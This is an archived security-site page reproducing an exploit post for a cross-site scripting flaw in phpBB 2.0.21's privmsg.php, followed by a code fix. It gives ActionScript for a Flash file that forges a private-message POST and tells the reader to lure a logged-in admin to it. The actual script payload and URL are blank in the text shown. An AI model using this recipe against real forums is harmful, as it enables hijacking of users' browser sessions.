Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web BBS :: Frequently Exploited :: c07-1832.htm

phpBB (privmsg.php) XSS Exploit
phpBB (privmsg.php) XSS Exploit
phpBB (privmsg.php) XSS Exploit

phpBB (privmsg.php) XSS Exploit

By: Demential
PhpBB website: 

Exploit tested on phpBB 2.0.21 said:

Input passed to the form field "Message body" in privmsg.php
is not properly sanitised before it is returned to the user
when sending messages to a non-existent user.
This can be exploited to execute arbitrary HTML and script code
in a user's browser session in context of an affected site.

The Exploit:

Create a Shockwave Flash file with this code:

var username:String = "user_that_doesnt_exist";
var subject:String = "Xss Exploitation";
var message:String = ""; 
var folder:String = "inbox";
var mode:String = "post";
var post:String = "Submit";
getURL("", "_self", "POST"); 

Put it into a web page:

Put a title here

Put some text here

And send it to the admin (or a normal user) users must be logged-in. Fixing: open phpBB2/privmsg.php find: if (!($to_userdata = $db->sql_fetchrow($result))) { $error = TRUE; $error_msg = $lang['No_such_user']; replace with: if (!($to_userdata = $db->sql_fetchrow($result))) { $error = TRUE; echo "Sorry, but no such user exists."; exit;

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH